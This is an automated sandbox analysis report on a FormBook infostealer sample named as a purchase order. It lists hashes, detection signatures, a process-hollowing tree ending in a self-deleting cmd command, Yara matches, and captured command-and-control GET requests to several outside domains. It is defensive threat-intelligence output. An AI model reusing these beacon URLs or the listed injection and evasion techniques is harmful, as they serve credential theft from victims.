
Analysis Report PO#47974GH397.exe

Overview

General Information

Sample Name: PO#47974GH397.exe
Analysis ID: 299603
MD5: 2eb304b953f7882a5450c4fa5793063c
SHA1: 869638f8e191f672a5586aadf57817d01dfb8c9d
SHA256: e4badaf86c0f22c6b31c97f661ba5af3f757697e7493c2e750a813173dec2273
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO#47974GH397.exe (PID: 6804 cmdline: 'C:\Users\user\Desktop\PO#47974GH397.exe' MD5: 2EB304B953F7882A5450C4FA5793063C)
    • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO#47974GH397.exe (PID: 6220 cmdline: C:\Users\user\Desktop\PO#47974GH397.exe MD5: 2EB304B953F7882A5450C4FA5793063C)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 7084 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6064 cmdline: /c del 'C:\Users\user\Desktop\PO#47974GH397.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.PO#47974GH397.exe.680000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.PO#47974GH397.exe.680000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0.2.PO#47974GH397.exe.680000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
0.2.PO#47974GH397.exe.680000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.PO#47974GH397.exe.680000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: PO#47974GH397.exe | ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: PO#47974GH397.exe | Joe Sandbox ML: detected
Source: 0.2.PO#47974GH397.exe.680000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.PO#47974GH397.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 0_2_00872595 FindFirstFileExW, 0_2_00872595
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00872595 FindFirstFileExW, 10_2_00872595
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 4x nop then pop edi, 10_2_0041502C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi, 14_2_0059502C

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49756
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49763
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49765
Source: global traffic | HTTP traffic detected: GET /d8h/?LL0=MhVrkd+BH7EfIC7UMZ6NNsIyivh3rs3YLYA2B681+Io0UxqoN/0Kf6ttoARFajJ8w2VH&Uxl0=AjGdKDV HTTP/1.1 | Host: www.steeltownlabs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?LL0=zqmrbz2GSNEF40GbFWf5jI58xAusWeMf/pW86Dj8ttUv5A8DnqXHvlA3jvurE0I2Q1gR&Uxl0=AjGdKDV HTTP/1.1 | Host: www.igensheets.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?LL0=fzokW3/OIykmhopALxfTmh/FjffJxl1EnyCunmGL8YrSGft99pw64/62N1TdrtahIrhj&Uxl0=AjGdKDV HTTP/1.1 | Host: www.interaction-logistics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?LL0=BeM5oIWdPTJOiFnjQO+IqBO/neltk2vktJQt+Ph2cW5xLg9JehTbyWJpLiw3GNRJely5&Uxl0=AjGdKDV HTTP/1.1 | Host: www.jerseycoastcollectibles.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?LL0=ObwgsRM7dcJAlA1y+ycgiUqsnNVZw59s173MjYldMxLq8hK3Qjedo/wCEGL+rhqNG4rF&Uxl0=AjGdKDV HTTP/1.1 | Host: www.hiddenhillsgems.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?LL0=0JNaWD+vE3WAKhUwjj+TKeKuqytbEj/rGf7L+MsFdzHuvdvProgHb0a/NNp8I7FyRZal&Uxl0=AjGdKDV HTTP/1.1 | Host: www.bottrader.digital | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?LL0=Hq+6mioOa5zS+RTAheDyrTt2wHKRirpuZ3pzAQqkO6QOSy1kHwQMq1eFi5u11RtaPGvs&Uxl0=AjGdKDV HTTP/1.1 | Host: www.sparkasse-suedpfalz.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?LL0=8WkUkTlv9TEdGDe9rqHtpRXMtgPzvw8OHTjX5OuITs46esx4TOeHbG9/qOJ2WNaP40DD&Uxl0=AjGdKDV HTTP/1.1 | Host: www.keepamericansgreatagain.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: ASTRALUSNL
Source: Joe Sandbox View | ASN Name: BCPL-SGBGPNETGlobalASNSG
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: unknown | DNS traffic detected: queries for: www.steeltownlabs.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 17 Oct 2020 06:57:15 GMT | Server: Apache/2 | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000B.00000000.741118834.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: msiexec.exe, 0000000E.00000002.928724993.0000000004F7D000.00000004.00000001.sdmp | String found in binary or memory: https://www.sparkasse-suew.de/d8h/?LL0=Hq
Source: PO#47974GH397.exe, 00000000.00000002.738610318.0000000000A8A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: PO#47974GH397.exe
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00417B90 NtCreateFile, 10_2_00417B90
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00417C40 NtReadFile, 10_2_00417C40
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00417CC0 NtClose, 10_2_00417CC0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00417D70 NtAllocateVirtualMemory, 10_2_00417D70
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00417B8B NtCreateFile, 10_2_00417B8B
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00417CBA NtReadFile, 10_2_00417CBA
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00417D6C NtAllocateVirtualMemory, 10_2_00417D6C
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289910 NtAdjustPrivilegesToken, LdrInitializeThunk, 10_2_01289910
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_012899A0 NtCreateSection, LdrInitializeThunk, 10_2_012899A0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289860 NtQuerySystemInformation, LdrInitializeThunk, 10_2_01289860
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289840 NtDelayExecution, LdrInitializeThunk, 10_2_01289840
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_012898F0 NtReadVirtualMemory, LdrInitializeThunk, 10_2_012898F0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289A20 NtResumeThread, LdrInitializeThunk, 10_2_01289A20
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289A00 NtProtectVirtualMemory, LdrInitializeThunk, 10_2_01289A00
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289A50 NtCreateFile, LdrInitializeThunk, 10_2_01289A50
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289540 NtReadFile, LdrInitializeThunk, 10_2_01289540
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_012895D0 NtClose, LdrInitializeThunk, 10_2_012895D0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289710 NtQueryInformationToken, LdrInitializeThunk, 10_2_01289710
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_012897A0 NtUnmapViewOfSection, LdrInitializeThunk, 10_2_012897A0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289780 NtMapViewOfSection, LdrInitializeThunk, 10_2_01289780
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289FE0 NtCreateMutant, LdrInitializeThunk, 10_2_01289FE0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289660 NtAllocateVirtualMemory, LdrInitializeThunk, 10_2_01289660
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_012896E0 NtFreeVirtualMemory, LdrInitializeThunk, 10_2_012896E0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289950 NtQueueApcThread, 10_2_01289950
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_012899D0 NtCreateProcessEx, 10_2_012899D0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289820 NtEnumerateKey, 10_2_01289820
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_0128B040 NtSuspendThread, 10_2_0128B040
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_012898A0 NtWriteVirtualMemory, 10_2_012898A0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289B00 NtSetValueKey, 10_2_01289B00
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_0128A3B0 NtGetContextThread, 10_2_0128A3B0
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289A10 NtQuerySection, 10_2_01289A10
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289A80 NtOpenDirectoryObject, 10_2_01289A80
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289520 NtWaitForSingleObject, 10_2_01289520
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_0128AD30 NtSetContextThread, 10_2_0128AD30
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_01289560 NtWriteFile, 10_2_01289560
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739860 NtQuerySystemInformation, LdrInitializeThunk, 14_2_04739860
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739840 NtDelayExecution, LdrInitializeThunk, 14_2_04739840
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739540 NtReadFile, LdrInitializeThunk, 14_2_04739540
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739910 NtAdjustPrivilegesToken, LdrInitializeThunk, 14_2_04739910
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_047395D0 NtClose, LdrInitializeThunk, 14_2_047395D0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_047399A0 NtCreateSection, LdrInitializeThunk, 14_2_047399A0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739660 NtAllocateVirtualMemory, LdrInitializeThunk, 14_2_04739660
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739A50 NtCreateFile, LdrInitializeThunk, 14_2_04739A50
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739650 NtQueryValueKey, LdrInitializeThunk, 14_2_04739650
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_047396E0 NtFreeVirtualMemory, LdrInitializeThunk, 14_2_047396E0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_047396D0 NtCreateKey, LdrInitializeThunk, 14_2_047396D0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739710 NtQueryInformationToken, LdrInitializeThunk, 14_2_04739710
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739FE0 NtCreateMutant, LdrInitializeThunk, 14_2_04739FE0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_04739780 NtMapViewOfSection, LdrInitializeThunk, 14_2_04739780
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0473B040 NtSuspendThread, 14_2_0473B040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739820 NtEnumerateKey,14_2_04739820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047398F0 NtReadVirtualMemory,14_2_047398F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047398A0 NtWriteVirtualMemory,14_2_047398A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739560 NtWriteFile,14_2_04739560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739950 NtQueueApcThread,14_2_04739950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0473AD30 NtSetContextThread,14_2_0473AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739520 NtWaitForSingleObject,14_2_04739520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047395F0 NtQueryInformationFile,14_2_047395F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047399D0 NtCreateProcessEx,14_2_047399D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739670 NtQueryInformationProcess,14_2_04739670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739A20 NtResumeThread,14_2_04739A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739610 NtEnumerateValueKey,14_2_04739610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739A10 NtQuerySection,14_2_04739A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739A00 NtProtectVirtualMemory,14_2_04739A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739A80 NtOpenDirectoryObject,14_2_04739A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739770 NtSetInformationFile,14_2_04739770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0473A770 NtOpenThread,14_2_0473A770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739760 NtOpenProcess,14_2_04739760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739730 NtQueryVirtualMemory,14_2_04739730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0473A710 NtOpenProcessToken,14_2_0473A710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739B00 NtSetValueKey,14_2_04739B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0473A3B0 NtGetContextThread,14_2_0473A3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047397A0 NtUnmapViewOfSection,14_2_047397A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597B90 NtCreateFile,14_2_00597B90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597C40 NtReadFile,14_2_00597C40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597CC0 NtClose,14_2_00597CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597D70 NtAllocateVirtualMemory,14_2_00597D70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597B8B NtCreateFile,14_2_00597B8B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597CBA NtReadFile,14_2_00597CBA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597D6C NtAllocateVirtualMemory,14_2_00597D6C
